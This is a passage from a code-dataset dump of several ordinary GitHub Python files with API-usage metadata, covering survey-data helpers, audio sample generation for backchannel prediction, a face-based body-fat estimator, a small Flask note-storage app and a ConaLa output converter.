"PIL.Image", "line_number": 51, "usage_type": "name"}, {"api_name": "numpy.any", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "streamlit.file_uploader", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.ImageOps.fit", "line_number": 61, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 61, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 61, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 61, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 63, "usage_type": "attribute"}, {"api_name": "streamlit.text", "line_number": 68, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 72, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 72, "usage_type": "name"}, {"api_name": "streamlit.image", "line_number": 73, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 77, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 83, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 85, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 87, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 89, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 91, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 93, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 96, "usage_type": "call"}]} +{"seq_id": "5418401038", "text": "import pandas as pd\nimport numpy as np\nfrom collections import defaultdict\n\ndf = pd.read_csv('data/survey_results_public.csv')\nschema = pd.read_csv('data/survey_results_schema.csv')\n\ndef get_description(column_name, schema=schema):\n '''\n INPUT - schema - pandas dataframe with the schema of the developers survey\n column_name - string - the name of the column you would like to know about\n OUTPUT -\n desc - string - the description of the column\n '''\n desc = list(schema[schema['Column'] == column_name]['Question'])[0]\n return desc\n\n#Question 3\ndef total_count(col1, col2, look_for, df=df):\n '''\n INPUT:\n df - the pandas dataframe you want to search\n col1 - the column name you want to look through\n col2 - the column you want to count values from\n look_for - a list of strings you want to search for in each row of df[col]\n OUTPUT:\n new_df - a dataframe of each look_for with the count of how often it shows up\n '''\n new_df = defaultdict(int)\n #loop through list of ed types\n for val in look_for:\n #loop through rows\n for idx in range(df.shape[0]):\n #if the ed type is in the row add 1\n if val in df[col1][idx]:\n new_df[val] += int(df[col2][idx])\n new_df = pd.DataFrame(pd.Series(new_df)).reset_index()\n new_df.columns = [col1, col2]\n new_df.sort_values('count', ascending=False, inplace=True)\n return new_df\n\n\ndef create_dummy_df(df, cat_cols, dummy_na):\n '''\n INPUT:\n df - pandas dataframe with categorical variables you want to dummy\n cat_cols - list of strings that are associated with names of the categorical columns\n dummy_na - Bool holding whether you want to dummy NA vals of categorical columns or not\n\n OUTPUT:\n df - a new dataframe that has the following characteristics:\n 1. contains all columns that were not specified as categorical\n 2. removes all the original columns in cat_cols\n 3. dummy columns for each of the categorical columns in cat_cols\n 4. if dummy_na is True - it also contains dummy columns for the NaN values\n 5. Use a prefix of the column name with an underscore (_) for separating\n '''\n for col in cat_cols:\n try:\n # for each cat add dummy var, drop original column\n df = pd.concat([df.drop(col, axis=1), pd.get_dummies(df[col], prefix=col, prefix_sep='_', drop_first=True, dummy_na=dummy_na)], axis=1)\n except:\n continue\n return df\n", "repo_name": "wbagais/Stack_Overflow_Developer_Survey_2017", "sub_path": "helper.py", "file_name": "helper.py", "file_ext": "py", "file_size_in_byte": 2539, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 6, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 37, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 37, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "8433891035", "text": "from extract.readDB import DBReader\nfrom typing import List, Iterator, Tuple\nimport random\nfrom . import evaluate\nimport numpy as np\nimport os\nfrom os.path import join\nimport soundfile\nimport sys\nimport functools\nfrom extract.util import load_config, invert_channel\nfrom extract.feature import Audio\nfrom extract.readDB import loadDBReader, DBReader, swap_speaker, read_conversations, orig_noise_filter\n\nmin_truth_bcs = 3\nmonologue_length = 15\nthreshold = 0.62\n# blacklist because some have a lot of leaking between channels or bad quality\nblacklist = \"sw2193\".split(\",\")\n\n\ndef all_mono_segs(reader: DBReader, convs: List[str], min_truth_bcs):\n for conv in convs:\n if conv in blacklist:\n continue\n for channel in [\"A\", \"B\"]:\n convchannel = f\"{conv}-{channel}\"\n bcchannel = f\"{conv}-{invert_channel(channel)}\"\n for start, end in evaluate.get_monologuing_segments(reader, convchannel, monologue_length):\n bcs = [bc for (bc, bcInfo) in reader.get_backchannels(list(reader.get_utterances(bcchannel))) if\n float(bcInfo['from']) >= start and float(bcInfo['to']) <= end]\n if len(bcs) >= min_truth_bcs:\n yield conv, channel, convchannel, start, end\n\n\nfmt = \"wav\"\nconvFmt = \"mp3\"\n\n\ndef write_convert(fname, data, sample_rate, downmix: bool, convFmt: str):\n import subprocess, os.path\n if downmix:\n data = np.sum(data, axis=1, dtype='int16')\n soundfile.write(fname, data, sample_rate)\n if convFmt is not None:\n outname = os.path.splitext(fname)[0] + \".\" + convFmt\n subprocess.call(['ffmpeg', '-y', '-loglevel', 'panic', '-i', fname, '-c:a', 'libmp3lame', '-q:a', '3', outname])\n\ndef add_bc_to_audio_track(output_audio: Audio, start_index: int, bcs: List[Tuple[str, dict, float, Audio]]):\n bc, bcInfo, bc_start_offset, bc_audio = random.choice(bcs)\n audio_len_samples = bc_audio.shape[0]\n if start_index < 0:\n return\n if start_index + audio_len_samples > output_audio.shape[0]:\n audio_len_samples = output_audio.shape[0] - start_index\n output_audio[start_index:start_index + audio_len_samples] += bc_audio[0: audio_len_samples]\n return audio_len_samples\n\ndef get_bc_audio(reader: DBReader, total_length_audio_index: int, bcs: List[Tuple[str, dict, float, Audio]],\n predictions: Iterator[float]):\n output_audio = Audio(np.zeros(total_length_audio_index, dtype='int16'), sample_rate_hz=bcs[0][3].sample_rate_hz)\n\n for peak_s in predictions:\n # audio_len_s = reader.features.sample_index_to_time(bc_audio, audio_len_samples)\n start_s = peak_s - 0\n start_index = output_audio.time_to_sample_index(start_s)\n add_bc_to_audio_track(output_audio, start_index, bcs)\n\n return output_audio\n\n\nwant_margin = (-0.2, 0.2)\n\n\ndef write_wavs(reader: DBReader, convs: List[str], count_per_set: int, net_version: str, bc_sample_tracks,\n write_mono=True,\n write_orig=True,\n write_nn=True,\n write_truthrandom=True,\n write_random=True,\n downmix=False\n ):\n all = list(all_mono_segs(reader, convs, min_truth_bcs))\n print(f\"found {len(all)} fitting monologue segments of at least {monologue_length}s with ≥ {min_truth_bcs} bcs\")\n if count_per_set < len(all):\n random.shuffle(all)\n count = 0\n maxamplitudeOrig = 0.5\n maxamplitudeBC = 0.5\n for conv, channel, convchannel, start, end in all:\n if count == count_per_set:\n return\n out_dir = join(\"evaluate\", \"out\", net_version)\n os.makedirs(out_dir, exist_ok=True)\n print(f\"evaluating conv {convchannel} ({start}s-{end}s)\")\n _orig_audio = reader.features.get_adc(convchannel)\n\n start_inx = _orig_audio.time_to_sample_index(start)\n end_inx = _orig_audio.time_to_sample_index(end)\n # minlen = min(_orig_audio.size, nn_bc_audio.size)\n orig_audio = evaluate.normalize_audio(_orig_audio[start_inx:end_inx], maxamplitude=maxamplitudeOrig)\n\n bcconvchannel = f\"{conv}-{invert_channel(channel)}\"\n if write_mono:\n out_dir2 = join(out_dir, \"mono\")\n os.makedirs(out_dir2, exist_ok=True)\n write_convert(join(out_dir2, f\"{conv}{channel} @{start:.2f}s.{fmt}\"),\n orig_audio, 8000, downmix=False, convFmt=None)\n if write_nn or write_truthrandom or write_random:\n bc_sampletrack = None\n bcs = []\n while len(bcs) < 5:\n bc_sampletrack = random.choice(bc_sample_tracks)\n bcs = list(get_boring_bcs(config_path, bc_sampletrack))\n bcs = list(bcs_to_samples(reader, bcs))\n print(f\"with bc samples from {bc_sampletrack}\")\n if write_nn:\n out_dir2 = join(out_dir, \"nn\")\n os.makedirs(out_dir2, exist_ok=True)\n\n bctrack = bc_sampletrack.replace(\"-\", \"\")\n eval_conf = evaluate.get_best_eval_config(config_path, margin=want_margin)\n\n predictions = evaluate.get_predictions(config_path, convchannel, eval_conf)\n nn_bc_audio = get_bc_audio(reader, _orig_audio.size, bcs, predictions)\n nn_bc_audio = evaluate.normalize_audio(nn_bc_audio[start_inx:end_inx], maxamplitude=maxamplitudeBC)\n\n write_convert(join(out_dir2, f\"{conv}{channel} @{start:.2f}s BC=NN-{bctrack}.{fmt}\"),\n np.stack([orig_audio, nn_bc_audio], axis=1), 8000, downmix=downmix, convFmt='mp3')\n if write_orig:\n out_dir2 = join(out_dir, \"orig\")\n os.makedirs(out_dir2, exist_ok=True)\n truth_bc_audio = reader.features.get_adc(bcconvchannel)\n truth_bc_audio = evaluate.normalize_audio(truth_bc_audio[start_inx:end_inx], maxamplitude=maxamplitudeBC)\n\n write_convert(join(out_dir2, f\"{conv}{channel} @{start:.2f}s BC=Truth.{fmt}\"),\n np.stack([orig_audio, truth_bc_audio], axis=1), 8000, downmix=downmix, convFmt='mp3')\n if write_truthrandom:\n out_dir2 = join(out_dir, \"truthrandom\")\n os.makedirs(out_dir2, exist_ok=True)\n truth_predictor = [reader.getBcRealStartTime(bc) for (bc, bcInfo) in\n reader.get_backchannels(list(reader.get_utterances(bcconvchannel)))]\n truth_randomized_bc_audio = get_bc_audio(reader, _orig_audio.size, bcs, truth_predictor)\n truth_randomized_bc_audio = evaluate.normalize_audio(truth_randomized_bc_audio[start_inx:end_inx],\n maxamplitude=maxamplitudeBC)\n write_convert(join(out_dir2, f\"{conv}{channel} @{start:.2f}s BC=Truth-Randomized.{fmt}\"),\n np.stack([orig_audio, truth_randomized_bc_audio], axis=1), 8000, downmix=downmix,\n convFmt='mp3')\n if write_random:\n # selected / relevant from\n # evaluate/out/v050-finunified-16-g1be124b-dirty:lstm-best-features-power,pitch,ffv,word2vec_dim30-slowbatch/results.json\n # so it has same frequency as good nn result\n frequency = 1 # 8256 / 5109\n shuffle_in_talklen = True\n out_dir2 = join(out_dir, \"random\")\n os.makedirs(out_dir2, exist_ok=True)\n random_predictor = evaluate.random_predictor(reader, convchannel,\n dict(random_baseline=dict(frequency=frequency,\n shuffle_in_talklen=shuffle_in_talklen)))\n randomized_bc_audio = get_bc_audio(reader, _orig_audio.size, bcs, random_predictor)\n randomized_bc_audio = evaluate.normalize_audio(randomized_bc_audio[start_inx:end_inx],\n maxamplitude=maxamplitudeBC)\n write_convert(join(out_dir2,\n f\"{conv}{channel} @{start:.2f}s BC=Randomized-{frequency:.1f}x\"\n + f\"-{'T' if shuffle_in_talklen else 'A'}.{fmt}\"),\n np.stack([orig_audio, randomized_bc_audio], axis=1), 8000, downmix=downmix,\n convFmt='mp3')\n count += 1\n\n\n@functools.lru_cache()\ndef get_boring_bcs(config_path: str, convid: str):\n reader = loadDBReader(config_path)\n bcs = reader.get_backchannels(list(reader.get_utterances(convid)))\n l = []\n for (bc, bcInfo) in bcs:\n text = bcInfo['text'] # type: str\n if \"[laughter\" in text or \"[noise\" in text:\n continue\n filtered = reader.noise_filter(text).lower()\n if reader.bc_to_category[filtered] != 'neutral':\n continue\n l.append((bc, bcInfo))\n return l\n\n\ndef bcs_to_samples(reader: DBReader, bcs):\n for bc, bcInfo in bcs:\n adc = reader.features.get_adc(bcInfo['convid'])\n fromTime = reader.getBcRealStartTime(bc)\n from_index = adc.time_to_sample_index(fromTime)\n to_index = adc.time_to_sample_index(reader.getBcRealFirstEndTime(bc))\n audio = adc[from_index:to_index]\n if not is_pretty_silent(audio):\n yield bc, bcInfo, fromTime, audio\n\n\ndef is_pretty_silent(audio: Audio):\n pow = np.sqrt(sum(audio.astype('float32') ** 2) / len(audio))\n return pow < 500\n\n\ndef output_bc_samples(version_str, convids: List[str]):\n for convid in convids:\n out_dir = join(\"evaluate\", \"out\", version_str, \"BC\", convid)\n os.makedirs(out_dir, exist_ok=True)\n\n for i, (bc, bcInfo, bcStartOffset, audio) in enumerate(\n bcs_to_samples(reader, get_boring_bcs(config_path, convid))):\n text = bcInfo['text']\n pow = np.sqrt(sum(audio.astype('float32') ** 2) / len(audio))\n # print(f\"{conv}: {i:03d}: {pow:05.2f}\")\n print(f\"{convid}: {i}: {text}\")\n # audio = evaluate.normalize_audio(audio, maxamplitude=0.9)\n write_convert(join(out_dir, f\"{i:03d}.{fmt}\"), audio, 8000, downmix=False, convFmt=None)\n\n\ngood_bc_sample_tracks = \"sw2249-A,sw2254-A,sw2258-B,sw2297-A,sw2411-A,sw2432-A,sw2485-A,sw2606-B,sw2735-B,sw2762-A,sw4193-A\".split(\n \",\")\n# good_bc_sample_tracks = [\"sw2603-A\"]\n\n# noise leaking etc.\nbad_eval_tracks = [\"sw3536-A\", \"sw2519-B\", \"sw2854-A\", \"sw3422-A\", \"sw2163-B\", \"sw3384\", \"sw4028-B\", \"sw3662\", \"sw2073\",\n \"sw3105\", \"sw2307\", \"sw3942\", \"sw2307\", \"sw3715\", \"sw2027\", \"sw2849\", \"sw2787\", \"sw3357\", \"sw2389\"]\n# assume problems are symmetric\nbad_eval_convos = [track.split(\"-\")[0] for track in bad_eval_tracks]\n\ngood_eval_tracks = []\n\nif __name__ == '__main__':\n config_path = sys.argv[1]\n args = config_path.split(\"/\")\n version = \"None\"\n if len(args) == 4:\n _, _, version, _ = args\n\n config = load_config(config_path)\n reader = loadDBReader(config_path)\n conversations = read_conversations(config)\n eval_conversations = sorted(conversations['eval'])\n eval_conversations = [convo for convo in eval_conversations if convo not in bad_eval_convos]\n # valid_conversations = sorted(conversations['validate'])\n write_wavs(reader, eval_conversations, 1e10, version, good_bc_sample_tracks, write_mono=True, write_nn=True,\n write_orig=False, write_truthrandom=True, downmix=True)\n output_bc_samples(version, good_bc_sample_tracks)\n# write_wavs(reader, eval_conversations, 100000000, version, good_bc_sample_tracks,\n# )\n", "repo_name": "phiresky/backchannel-prediction", "sub_path": "evaluate/write_wavs.py", "file_name": "write_wavs.py", "file_ext": "py", "file_size_in_byte": 11552, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 52, "dataset": "github-code", "pt": "52", "api": [{"api_name": "extract.readDB.DBReader", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "extract.util.invert_channel", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 43, "usage_type": "call"}, {"api_name": "soundfile.write", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "subprocess.call", "line_number": 47, "usage_type": "call"}, {"api_name": "extract.feature.Audio", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 49, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 50, "usage_type": "call"}, {"api_name": "extract.readDB.DBReader", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 59, "usage_type": "name"}, {"api_name": "extract.feature.Audio", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Iterator", "line_number": 60, "usage_type": "name"}, {"api_name": "extract.feature.Audio", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 61, "usage_type": "call"}, {"api_name": "extract.readDB.DBReader", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 75, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 94, "usage_type": "call"}, {"api_name": "extract.util.invert_channel", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 107, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 118, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 139, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 155, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 166, "usage_type": "call"}, {"api_name": "extract.readDB.loadDBReader", "line_number": 173, "usage_type": "call"}, {"api_name": "functools.lru_cache", "line_number": 171, "usage_type": "call"}, {"api_name": "extract.readDB.DBReader", "line_number": 187, "usage_type": "name"}, {"api_name": "extract.feature.Audio", "line_number": 198, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 199, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 203, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 205, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 211, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 215, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 231, "usage_type": "attribute"}, {"api_name": "extract.util.load_config", "line_number": 237, "usage_type": "call"}, {"api_name": "extract.readDB.loadDBReader", "line_number": 238, "usage_type": "call"}, {"api_name": "extract.readDB.read_conversations", "line_number": 239, "usage_type": "call"}]} +{"seq_id": "71424286246", "text": "import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nimport numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom keras.layers import Input, Dense, Dropout, Flatten, Conv2D, MaxPooling2D, BatchNormalization, LeakyReLU\nimport pandas as pd\nimport cv2\nimport os\nimport subprocess\n\nfor (root,dirs,files) in os.walk(os.getcwd(), topdown=True):\n if 'model.h5' not in files:\n subprocess.run([\"gdown\", \"1VdNkNtdlyr6MK-Fox94bqyrBO50vhTlo\"]) \n else:\n print('found model.h5')\n if 'model2.h5' not in files:\n subprocess.run([\"gdown\",\"1ndsctNnxGWYUT26nQ8xsa_6mshBZ9xrV\"])\n else:\n print('found model2.h5')\n break\nmodel = tf.keras.models.load_model(\"model.h5\") #For BMI prediction\nmodel2 = tf.keras.models.load_model(\"model2.h5\") #For Age prediction\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n \ndef predictBodyFat(image):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # Detect the faces\n faces = face_cascade.detectMultiScale(gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(30, 30),\n flags=cv2.CASCADE_SCALE_IMAGE)\n # Draw the rectangle around each face\n for (x, y, w, h) in faces:\n face_frame = cv2.resize(image[x:x+h,y:y+h,:], (224, 224))\n \n \n face_frame = face_frame.reshape(1,224,224,3)\n bmi = model.predict(face_frame)[0][0]\n age = model2.predict(face_frame)[0][0]\n body_fat = 1.2*bmi + 0.23*age - 5.4\n\n return body_fat\n\n", "repo_name": "abhinavr11/engage22", "sub_path": "hosting/bodyFat/helperBodyFat.py", "file_name": "helperBodyFat.py", "file_ext": "py", "file_size_in_byte": 1586, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.walk", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 12, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 14, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 18, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.CascadeClassifier", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cv2.CASCADE_SCALE_IMAGE", "line_number": 33, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "10855622630", "text": "#!/usr/bin/python\nfrom kyotocabinet import *\nfrom datetime import datetime\nfrom flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash, _app_ctx_stack, config, views\nfrom flask.ext.wtf import Form, TextAreaField, TextField, validators, ValidationError\nimport json, re\n\nclass Config():\n DB = \"bucket.kct\"\n LENS_STOR = \"lens.kch\"\n DEBUG = True\n SECRET_KEY = 'development key'\n USERNAME = 'admin'\n PASSWORD = 'default'\n\napp = Flask(__name__)\napp.config.from_object('lifebucket.Config')\n#app.config.from_envvar('LIFEBUCKET_CONFIG')\n\n# \"Constants\"\nOK = u'success'\nNO = u'failure'\nclass Insert(Form):\n value = TextAreaField('Value', validators=[validators.Required()])\n\ndef lensCheck(form, field):\n pass\n\nclass View(Form):\n lens = TextField('Lens', validators=[validators.Required(), lensCheck])\n\nclass Lens(views.MethodView):\n def get(self, lens_id):\n with app.app_context():\n db = get_lens()\n if lens_id is None:\n return json.dumps([ [ int(lens_id), db[lens_id] ] for lens_id in db ])\n else:\n return json.dumps([ int(lens_id), db[lens_id] ])\n\n def post(self):\n with app.app_context():\n if len(re.split(';', request.form.get('lens', ''))) == 3:\n db = get_lens()\n new_key=db.get('avail') or 0\n db.set(new_key, request.form.get('lens', ''))\n db.set('avail', int(new_key)+1)\n return json.dumps({'status':OK, 'lens':new_key})\n else:\n return json.dumps({'status':NO, 'info':request.form.get('lens', '')})\n\n def delete(self, lens_id):\n with app.app_context():\n db = get_lens()\n if db.remove(lens_id):\n return json.dumps({'status':OK, 'lens': lens_id})\n else:\n return json.dumps({'status':NO, 'error': 'No such lens_id'})\n\n def put(self, lens_id):\n with app.app_context():\n db = get_lens()\n if db.replace(lens_id, request.form.get('lens', '')):\n return json.dumps({'status': OK})\n else:\n return json.dumps({'status':NO, 'error': 'No such lens_id'})\n\n# steal some flask docs code\nlens_view = Lens.as_view('lens_api')\napp.add_url_rule('/lens/', defaults={'lens_id': None}, view_func=lens_view, methods=['GET',])\napp.add_url_rule('/lens/', view_func=lens_view, methods=['POST',])\napp.add_url_rule('/lens/<int:lens_id>', view_func=lens_view, methods=['GET', 'PUT', 'DELETE'])\n\n\ndef get_db():\n \"\"\"Opens a new database connection if there is none yet for the\n current application context.\n \"\"\"\n top = _app_ctx_stack.top\n if not hasattr(top, 'db'):\n top.db = DB()\n top.db.open(app.config['DB'], DB.OWRITER | DB.OCREATE)\n return top.db\n\ndef get_lens():\n \"\"\"Opens a new database connection if there is none yet for the\n current application context.\n \"\"\"\n top = _app_ctx_stack.top\n if not hasattr(top, 'lens'):\n top.lens = DB()\n top.lens.open(app.config['LENS_STOR'], DB.OWRITER | DB.OCREATE)\n return top.lens\n\n@app.route('/')\ndef index():\n form = Insert()\n if form.validate_on_submit():\n flash(\"Success\")\n return redirect(url_for(\"index\"))\n return render_template('index.html', form=form)\n\n#@app.route('/lens')\n#def lens_input():\n# form = View()\n# if form.validate_on_submit():\n# flash(\"Success\")\n# return redirect(url_for(\"output\"))\n# return render_template('lens_input.html', form=form)\n\n@app.route('/settings')\ndef settings():\n return render_template('settings.html')\n\n@app.route('/license')\ndef copyright():\n return render_template('copyright.html')\n\n@app.route('/help')\ndef help():\n return render_template('help.html')\n\n@app.route('/api/value', methods=(\"POST\", \"PUT\"))\ndef post_value():\n with app.app_context():\n db = get_db()\n db.set(datetime.utcnow(), json.dumps(request.args.to_dict()['value']))\n db.commit()\n return jsonify(status=OK)\n return jsonify(status=NO)\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "hdonnay/lifebucket", "sub_path": "lifebucket.py", "file_name": "lifebucket.py", "file_ext": "py", "file_size_in_byte": 4149, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.ext.wtf.Form", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.ext.wtf.TextAreaField", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.ext.wtf.validators.Required", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.ext.wtf.validators", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.ext.wtf.Form", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.ext.wtf.TextField", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.ext.wtf.validators.Required", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.ext.wtf.validators", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.views.MethodView", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.views", "line_number": 32, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 37, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 39, "usage_type": "call"}, {"api_name": "re.split", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 46, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 46, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 48, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 50, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 56, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 63, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 64, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 66, "usage_type": "call"}, {"api_name": "flask._app_ctx_stack.top", "line_number": 79, "usage_type": "attribute"}, {"api_name": "flask._app_ctx_stack", "line_number": 79, "usage_type": "name"}, {"api_name": "flask._app_ctx_stack.top", "line_number": 89, "usage_type": "attribute"}, {"api_name": "flask._app_ctx_stack", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 113, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 117, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 121, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 127, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 127, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 127, "usage_type": "call"}, {"api_name": "flask.request.args.to_dict", "line_number": 127, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 127, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 127, "usage_type": "name"}]} +{"seq_id": "42240659807", "text": "import os\r\nfrom evaluate import ConalaEval\r\nimport json \r\nimport util\r\n\r\nBASE_DIR = os.path.join( os.path.dirname( __file__ ), '..' )\r\n\r\ndef convert_to_competition_format(path, from_name): \r\n with open(BASE_DIR + '/' + path + '/' + from_name, 'r', encoding='UTF-8') as f:\r\n model_results = f.readlines()\r\n \r\n # Building JSON txt format in a brute - force way\r\n with open(BASE_DIR + '/' + path + '/answer.txt', 'w', encoding='utf-8') as outfile:\r\n outfile.writelines('[')\r\n outfile.write('\\n')\r\n for idx, line in enumerate(model_results):\r\n line_decoded = util.encoded_code_tokens_to_code_sl(line.split())\r\n outfile.write('\\\"' + str(line_decoded).replace('\\n', '\\\\n').replace('\"', '') + '\\\"')\r\n if idx != len(model_results) - 1:\r\n outfile.write(',')\r\n outfile.write('\\n')\r\n outfile.writelines(']')\r\n \r\n with open(BASE_DIR + '/' + path + '/answer.txt', \"r\") as f:\r\n data = json.load(f)\r\n print(data)\r\n #with open(BASE_DIR + '/' + 